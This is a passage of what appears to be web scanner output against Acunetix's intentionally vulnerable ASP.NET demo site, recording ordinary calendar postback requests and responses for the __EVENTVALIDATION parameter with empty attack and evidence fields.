feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1161 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,161 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8150&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAiopOJtoIZGRkr4a5xT4rq4TOJK5539Ru049WXUo%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLF64LxAQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy%2FPoBQLcy%2FPoBQLcy%2BePDQLcy%2BePDQLcy5uiBgLcy5uiBgLcy4%2F5DwLcy4%2F5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv%2F6gIC3Mv%2F6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp%2FQ8CsdKp%2FQ8CsdLdkQcCsdLdkQcCsdKx%2BQUCsdKx%2BQUCsdKlnA0CsdKlnA0Civm3BQKK%2BbcFAor5q9gJAor5q9gJAor53%2FwCAor53%2FwCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j%2BAFAor5j%2BAFAor5o4cNAor5o4cNAor5l%2BwLAor5l%2BwLAor5i4MDAor5i4MDAr%2BT98QJAr%2BT98QJAr%2BT65sBAr%2BT65sBAr%2BTn74KAr%2BTn74KAr%2BTs9UDAr%2BTs9UDAr%2BTp%2BgMAr%2BTp%2BgMAr%2BT24wEAr%2BT24wEAr%2BTz6MNAr%2BTz6MNAr%2BT48YGAr%2BT48YGAr%2BT168DAr%2BT168DAr%2BTy8IMAr%2BTy8IMApC61esPApC61esPsv5TUuA9RD0MNTcr2Zt6a3pbAl4%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:45:51 GMT Content-Length: 12431
Response Body - size: 12,431 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgBABYkFK9oIHgJTRBYBBgDAiopOJtoIZGRkr4a5xT4rq4TOJK5539Ru049WXUo=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLF64LxAQK645OfAwK746uPDAL7pOHDAgL7pOHDAgLcy/PoBQLcy/PoBQLcy+ePDQLcy+ePDQLcy5uiBgLcy5uiBgLcy4/5DwLcy4/5DwLcy6OcBwLcy6OcBwLcy9cwAtzL1zAC3MvL1wkC3MvL1wkC3Mv/6gIC3Mv/6gIC3MvT0w8C3MvT0w8C3MvH9ggC3MvH9ggCsdLRnwoCsdLRnwoCsdLFsgMCsdLFsgMCsdL5yQwCsdL5yQwCsdLt7AUCsdLt7AUCsdKBgw0CsdKBgw0CsdK1pgYCsdK1pgYCsdKp/Q8CsdKp/Q8CsdLdkQcCsdLdkQcCsdKx+QUCsdKx+QUCsdKlnA0CsdKlnA0Civm3BQKK+bcFAor5q9gJAor5q9gJAor53/wCAor53/wCAor585MKAor585MKAor557YDAor557YDAor5m80MAor5m80MAor5j+AFAor5j+AFAor5o4cNAor5o4cNAor5l+wLAor5l+wLAor5i4MDAor5i4MDAr+T98QJAr+T98QJAr+T65sBAr+T65sBAr+Tn74KAr+Tn74KAr+Ts9UDAr+Ts9UDAr+Tp+gMAr+Tp+gMAr+T24wEAr+T24wEAr+Tz6MNAr+Tz6MNAr+T48YGAr+T48YGAr+T168DAr+T168DAr+Ty8IMAr+Ty8IMApC61esPApC61esPsv5TUuA9RD0MNTcr2Zt6a3pbAl4=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8126')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">May 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:White" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8163')" style="color:Black" title="May 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8164')" style="color:Black" title="May 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8165')" style="color:Black" title="May 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8166')" style="color:Black" title="May 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8167')" style="color:Black" title="May 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8168')" style="color:Black" title="May 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8169')" style="color:Black" title="May 14">14</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8170')" style="color:Black" title="May 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8171')" style="color:Black" title="May 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8172')" style="color:Black" title="May 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8173')" style="color:Black" title="May 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8174')" style="color:Black" title="May 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8175')" style="color:Black" title="May 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8176')" style="color:Black" title="May 21">21</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8177')" style="color:Black" title="May 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8178')" style="color:Black" title="May 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8179')" style="color:Black" title="May 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8180')" style="color:Black" title="May 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8181')" style="color:Black" title="May 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8182')" style="color:Black" title="May 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8183')" style="color:Black" title="May 28">28</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1131 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,131 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8194&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAt9ThSNoIZGRkEpZ4YjTC9WIDSop3a%2FaLZFkejuY%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLFicGqAQK646%2FsDgKcisLvAQK%2Fk6foDAK%2Fk6foDAK%2Fk9uMBAK%2Fk9uMBAK%2Fk8%2BjDQK%2Fk8%2BjDQK%2Fk%2BPGBgK%2Fk%2BPGBgK%2Fk9evAwK%2Fk9evAwK%2Fk8vCDAK%2Fk8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6%2FSUCkLqR%2BAkCkLqR%2BAkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ%2FJwKAtfZ%2FJwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC%2BKQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w96ltZ%2FT9zC0Pzscc9c%2Bc3Uts%2BaWw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:06:31 GMT Content-Length: 12444
Response Body - size: 12,444 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCA06thQ9oIHgJTRBYBBgDAt9ThSNoIZGRkEpZ4YjTC9WIDSop3a/aLZFkejuY=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLFicGqAQK646/sDgKcisLvAQK/k6foDAK/k6foDAK/k9uMBAK/k9uMBAK/k8+jDQK/k8+jDQK/k+PGBgK/k+PGBgK/k9evAwK/k9evAwK/k8vCDAK/k8vCDAKQutXrDwKQutXrDwKQusmOBwKQusmOBwKQuv0lApC6/SUCkLqR+AkCkLqR+AkCkLqFnwECkLqFnwECkLq5sgoCkLq5sgoCkLqtyQMCkLqtyQMCkLrB7QwCkLrB7QwCkLq11QkCkLq11QkCkLqp6AICkLqp6AIC19nongcC19nongcC19mcNQLX2Zw1AtfZsMgJAtfZsMgJAtfZpO8CAtfZpO8CAtfZ2IMKAtfZ2IMKAtfZzKYDAtfZzKYDAtfZ4P0MAtfZ4P0MAtfZlJAEAtfZlJAEAtfZyPkCAtfZyPkCAtfZ/JwKAtfZ/JwKAqjgzoUNAqjgzoUNAqjg4tgGAqjg4tgGAqjglv8PAqjglv8PAqjgipIHAqjgipIHAqjgvikCqOC+KQKo4NLNCQKo4NLNCQKo4MbgAgKo4MbgAgKo4PqHCgKo4PqHCgKo4K7vCAKo4K7vCAKo4MIDAqjgwgMCjfesqwMCjfesqwMCjffAzwwCjffAzwwCjff04gUCjff04gUCjffouQ0CjffouQ0Cjfec3AYCjfec3AYCjfew8w8Cjfew8w96ltZ/T9zC0Pzscc9c+c3Uts+aWw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">June 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8217')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8184')" style="color:Black" title="May 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8185')" style="color:Black" title="May 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8186')" style="color:Black" title="May 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8187')" style="color:Black" title="June 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8188')" style="color:Black" title="June 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8189')" style="color:Black" title="June 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8190')" style="color:Black" title="June 04">4</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8191')" style="color:Black" title="June 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8192')" style="color:Black" title="June 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8193')" style="color:Black" title="June 07">7</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8194')" style="color:White" title="June 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8195')" style="color:Black" title="June 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8196')" style="color:Black" title="June 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8197')" style="color:Black" title="June 11">11</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8198')" style="color:Black" title="June 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8199')" style="color:Black" title="June 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8200')" style="color:Black" title="June 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8201')" style="color:Black" title="June 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8202')" style="color:Black" title="June 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8203')" style="color:Black" title="June 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8204')" style="color:Black" title="June 18">18</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8205')" style="color:Black" title="June 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8206')" style="color:Black" title="June 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8207')" style="color:Black" title="June 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8208')" style="color:Black" title="June 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8209')" style="color:Black" title="June 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8210')" style="color:Black" title="June 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8211')" style="color:Black" title="June 25">25</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> 